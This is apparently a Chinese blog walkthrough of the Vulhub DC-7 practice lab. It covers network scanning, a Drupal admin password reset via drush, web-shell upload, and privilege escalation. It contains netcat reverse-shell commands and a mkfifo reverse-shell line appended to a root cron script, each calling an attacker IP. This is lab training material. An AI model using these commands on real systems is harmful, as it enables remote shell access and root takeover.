Vulhub-DC-7靶场实战攻略

arp-scan -l
nmap -T4 -A 192.168.206.141

PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了  也可以借鉴下面这个思路  通过drush重置密码

进入/var/www/html/  目录下以后

由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户

drush user-password admin --password="abcdefg" 

接下来考虑写入一个php文件 由于写入部分没有允许php的后缀 我们加载一个drupal专用的支持php写入的插件

Linux下把文件压缩成tar.gz的命令

tar -zczf tools.tar.gz [文件夹名]
tar -zczf tools.tar.gz php

之后我们需要把这个插件给加载启动一下

之后就支持写入php文件了

写入成功以后 就可以查找相应的文件 点开即可获取位置  可以通过工具一句话链接  也可以使用kali的工具weevely生成木马上线 这里不多赘述

这里是补充的nc上线的方式

nc -lvp 4444
nc -e /bin/bash [黑客ip] [黑客端口]
nc -e /bin/bash 192.168.206.128 4444

通过中国蚁剑上线以后 进入虚拟终端

先在kali中进行监听

nc -lvp 12345

进入/opt/scripts/  目录下  可以用如下的命令写入计划任务

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.206.128 12345 > /tmp/f" >> backups.sh

也可以直接在文件管理中手动添加相应的内容即可

之后保存 等待系统计划任务去执行这条命令  就可以在nc上看到上线了 并且是root权限

PS:如果手动去执行这个sh文件  那么获得的只是普通权限  但是计划任务是系统自动执行的时候  反弹出来的就是root权限

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值